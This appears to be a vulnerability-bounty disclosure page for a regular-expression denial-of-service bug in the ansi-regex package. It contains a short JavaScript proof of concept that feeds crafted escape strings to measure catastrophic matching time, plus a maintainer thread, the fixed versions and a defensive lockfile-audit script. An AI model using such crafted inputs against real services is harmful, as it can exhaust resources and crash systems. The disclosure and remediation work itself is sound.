Inefficient Regular Expression Complexity in chalk/ansi-regex

Valid

Reported on

Sep 9th 2021


✍️ Description

It can cause a denial of service when matching crafted invalid ANSI escape codes.

🕵️‍♂️ Proof of Concept

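// PoC.mjs
import ansiRegex from 'ansi-regex';

// Time one match per iteration against an escape prefix followed by a
// growing run of ';' characters, and log how the cost scales with length.
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B[" + ";".repeat(i * 10000);
    ansiRegex().test(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}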

💥 Impact

This vulnerability can exhaust system resources and lead to crashes.

Occurrences

Yeting Li submitted a
10 months ago
Yeting Li
10 months ago

Researcher


Hi @admin, could you help me contact the maintainer to confirm the vulnerability and patch?

Z-Old
10 months ago

Admin


Hey Yeting, of course. I've just sent security@tidelift.com an email, as per their security policy. I'll update you when we hear back from them.

We have contacted a member of the chalk/ansi-regex team and are waiting to hear back 10 months ago
Yeting Li
10 months ago

Researcher


Hi Ziding @admin, thanks for your efforts. The maintainer has now confirmed my disclosure and patch (see the commit).

chalk/ansi-regex maintainer
10 months ago

@yetingli This is the second time you have been told to do a responsible closure. That means not submitting a pull request or opening an issue until the report has been validated.

The severity (and IMHO bounty) in this report is also too high. The issue affects pretty much no one as ansi-regex is mostly used for command-line tools, not in servers.

Yeting Li
10 months ago

Researcher


Thank you for your reply, @Sindre Sorhus. I just did a responsible closure on huntr.dev, but I accidentally pulled when I submitted the patch. Thank you again for your reminder!

Yeting Li
10 months ago

Researcher


The bounty setting may be related to the popularity of the project? I'm not sure, you @Sindre Sorhus can ask @admin?

chalk/ansi-regex maintainer validated this vulnerability 9 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
chalk/ansi-regex maintainer confirmed that a fix has been merged on 8d1d7c 9 months ago
Yeting Li has been awarded the fix bounty
index.js#L3 has been validated
chalk/ansi-regex maintainer
9 months ago

Fixed in:

  • 6.0.1: https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
  • 5.0.1: https://github.com/chalk/ansi-regex/releases/tag/v5.0.1
Jamie Slome
9 months ago

Admin


CVE published! 🎉

Yeting Li
9 months ago

Researcher


Thanks.

Thayol
2 months ago

We also have:

4.1.1: https://github.com/chalk/ansi-regex/releases/tag/v4.1.1

This is a tag without a release. It includes the same fix as 5.0.1 and 6.0.1 (https://github.com/chalk/ansi-regex/pull/37)
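
A lockfile check for the fixed versions named in this thread (6.0.1, 5.0.1 and the 4.1.1 tag), added here as an example and not code from the report or from the ansi-regex project. The function names and the sample lockfile are constructed for illustration; release lines the thread does not mention are reported as not-listed rather than guessed.

```javascript
// Fixed versions as listed on this page, keyed by major release line.
const FIXED = { 4: [4, 1, 1], 5: [5, 0, 1], 6: [6, 0, 1] };

// Parse "x.y.z" (ignoring any prerelease/build suffix) into three numbers.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? m.slice(1).map(Number) : null;
}

// Classify one installed ansi-regex version against the page's fix list.
function classify(version) {
  const v = parseVersion(version);
  if (!v) return 'unparseable';
  const fixed = FIXED[v[0]];
  if (!fixed) return 'not-listed'; // release line not mentioned on this page
  for (let i = 0; i < 3; i++) {
    if (v[i] !== fixed[i]) return v[i] > fixed[i] ? 'fixed' : 'upgrade';
  }
  return 'fixed';
}

// Walk the "packages" map of a package-lock.json (lockfileVersion 2 or 3)
// and report every installed copy of ansi-regex, including nested copies
// pulled in by other dependencies.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!/(^|\/)node_modules\/ansi-regex$/.test(path)) continue;
    findings.push({ path, version: meta.version, status: classify(meta.version) });
  }
  return findings;
}

// Constructed sample lockfile fragment (not taken from any real project).
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/ansi-regex': { version: '5.0.1' },
    'node_modules/strip-ansi/node_modules/ansi-regex': { version: '5.0.0' },
    'node_modules/wrap-ansi/node_modules/ansi-regex': { version: '6.0.0' },
    'node_modules/old-cli/node_modules/ansi-regex': { version: '4.1.0' },
    'node_modules/legacy/node_modules/ansi-regex': { version: '2.1.1' },
  },
};

for (const f of auditLockfile(sampleLock)) {
  console.log(`${f.status.padEnd(11)} ${String(f.version).padEnd(7)} ${f.path}`);
}
```

To audit a real project, pass the parsed contents of its package-lock.json to `auditLockfile` in place of `sampleLock`.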
